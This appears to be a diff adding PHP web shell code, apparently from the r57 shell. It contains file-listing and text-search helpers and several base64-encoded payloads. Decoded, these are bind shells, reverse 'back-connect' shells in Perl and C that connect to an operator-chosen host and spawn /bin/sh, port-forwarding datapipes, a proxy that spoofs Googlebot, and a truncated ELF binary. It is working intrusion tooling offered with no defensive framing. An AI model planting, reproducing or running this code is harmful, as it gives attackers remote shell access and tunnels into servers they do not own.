+{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) + { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld +2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn +luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT +0NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE +UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09 +DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS +AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd +GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk +cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1 +BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi +AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK +TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg +eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA +oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG +VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI +CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt +b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN +0ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG +9wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ +CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g +aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw +gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG +9yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0="; +$port_bind_bd_cs="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABM